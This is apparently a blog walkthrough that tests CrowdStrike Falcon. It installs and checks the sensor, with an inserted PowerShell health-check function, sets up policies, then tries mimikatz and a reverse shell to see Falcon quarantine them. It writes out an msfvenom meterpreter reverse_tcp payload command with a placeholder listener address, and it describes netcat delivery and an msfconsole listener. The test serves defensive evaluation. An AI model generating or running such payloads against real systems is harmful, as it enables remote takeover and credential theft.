What is CrowdStrike Falcon?

CrowdStrike Falcon is a platform built specifically to stop breaches and prevent attacks of all kinds.

Let’s dive in.

sensor-falcon
First let’s set up the sensor…

Then we check whether our sensors are working.

  • On Windows

cmd-query-for-sensors

  • On Falcon

installed-sensor
&&
sensorr-check
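The Windows-side check from the screenshot above, as an added PowerShell example (not from the original post): it runs the documented `sc query csagent` check for the sensor's kernel driver and also looks at the user-mode service, which is assumed here to be registered as CSFalconService.

```powershell
# Added example: verify that the Falcon sensor is installed and running on a Windows host.
# Assumptions: the driver is registered as the 'csagent' service and the
# user-mode sensor service is named 'CSFalconService'.
function Test-FalconSensor {
    [CmdletBinding()]
    param()

    $result = [ordered]@{
        DriverLoaded   = $false   # 'sc query csagent' reports STATE ... RUNNING
        ServiceRunning = $false   # CSFalconService reports Running
        Healthy        = $false   # both of the above
    }

    # The sensor's kernel driver shows up as the 'csagent' service.
    $driverOutput = & sc.exe query csagent 2>&1
    if ($LASTEXITCODE -eq 0 -and (($driverOutput -join "`n") -match 'STATE\s*:\s*\d+\s+RUNNING')) {
        $result.DriverLoaded = $true
    }

    # The user-mode sensor service; absent on a host with no sensor installed.
    $svc = Get-Service -Name 'CSFalconService' -ErrorAction SilentlyContinue
    if ($svc -and $svc.Status -eq 'Running') {
        $result.ServiceRunning = $true
    }

    $result.Healthy = $result.DriverLoaded -and $result.ServiceRunning
    [pscustomobject]$result
}

# Usage: a Healthy value of False means the host is not protected and should not
# be counted on for the policy tests that follow.
Test-FalconSensor
```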

Now we need to add some policies before we test Falcon.
For this we must first add our computers to a group, because a policy applies to every host in that group.

creation-group

From here we can add our computer to the group.
After that we can create our policy.

create-policy

Now let’s try to install mimikatz.
For this I used the git command.

installation-mimikatz

We can see Falcon’s notification at the bottom right, and Falcon quarantined the entire file.

quarantined-files

If we look at the endpoint detection pane, it looks like this…

crowdstrike-review

Now let’s create a reverse shell for Windows with msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip-addr> LPORT=<port-number> --format exe -o payload.exe

msfvenom-payload

Then we send this payload to the Windows machine with netcat.

netcat-payload

Now we can listen with msfconsole.

msfconsole

payload-falcon-result

When you run the file, Falcon detects it and quarantines it.